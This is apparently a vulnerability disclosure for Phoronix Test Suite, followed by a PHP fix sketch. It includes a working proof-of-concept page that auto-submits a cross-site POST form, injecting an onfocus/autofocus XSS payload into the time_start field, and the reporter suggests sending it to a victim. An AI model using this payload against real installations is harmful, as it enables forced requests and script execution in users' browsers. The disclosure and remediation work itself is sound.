Hi, I found a Reflected XSS vulnerability (POST-based XSS + no CSRF token) in Phoronix Test Suite, Results tab.
Install a local instance of Phoronix Test Suite.
Create a Search results form like this:
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8222/?results" method="POST">
<input type="hidden" name="time_start" value="2022-02-08"onfocus="confirm(origin)"autofocus="" />
<input type="hidden" name="time_end" value="2022-02-09" />
<input type="hidden" name="containing_tests" value="testt" />
<input type="hidden" name="result_limit" value="100" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
//
and send it to the victim. When the victim clicks on the link, the result is reflected cross-site scripting.
This vulnerability is capable of Reflected XSS
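A sketch of the server-side fix for the two weaknesses named above (the `time_start` value reflected into an attribute, and the missing CSRF token). This is an added example, not Phoronix Test Suite's own code; the function names, the `csrf` field and the session array are hypothetical.

```php
<?php
declare(strict_types=1);
// Hypothetical helpers illustrating the fix; none of these names come from Phoronix Test Suite.

// Encode for an HTML attribute context so a quote cannot close value="...".
function attr(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Accept only a strict YYYY-MM-DD date; anything else falls back to the default.
function clean_date($raw, string $default): string {
    if (!is_string($raw)) { return $default; }
    $d = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    return ($d !== false && $d->format('Y-m-d') === $raw) ? $raw : $default;
}

// Per-session random token, embedded in every form the application renders.
function csrf_token(array &$session): string {
    $session['csrf'] ??= bin2hex(random_bytes(32));
    return $session['csrf'];
}

// Constant-time comparison of the posted token with the session's token.
function csrf_ok(array $session, array $post): bool {
    $sent = $post['csrf'] ?? '';
    return is_string($sent) && isset($session['csrf'])
        && hash_equals($session['csrf'], $sent);
}

function render_results_form(array &$session, array $post, string $today): string {
    // A POST without a valid token (such as a cross-site form) is treated as empty.
    $in = csrf_ok($session, $post) ? $post : [];
    $start = clean_date($in['time_start'] ?? null, $today);
    $end   = clean_date($in['time_end'] ?? null, $today);
    return '<form method="post" action="?results">'
        . '<input type="hidden" name="csrf" value="' . attr(csrf_token($session)) . '">'
        . '<input type="date" name="time_start" value="' . attr($start) . '">'
        . '<input type="date" name="time_end" value="' . attr($end) . '">'
        . '</form>';
}

// Constructed request: the time_start value from the report, sent without a token.
$session = [];
$post = ['time_start' => '2022-02-08"onfocus="confirm(origin)"autofocus="',
         'time_end'   => '2022-02-09'];
echo render_results_form($session, $post, '2022-02-09'), PHP_EOL;

// Same value with a valid token: the date check rejects it, and attr() would
// still neutralise the quotes if it were ever echoed.
$post['csrf'] = $session['csrf'];
echo render_results_form($session, $post, '2022-02-09'), PHP_EOL;
echo attr($post['time_start']), PHP_EOL;
```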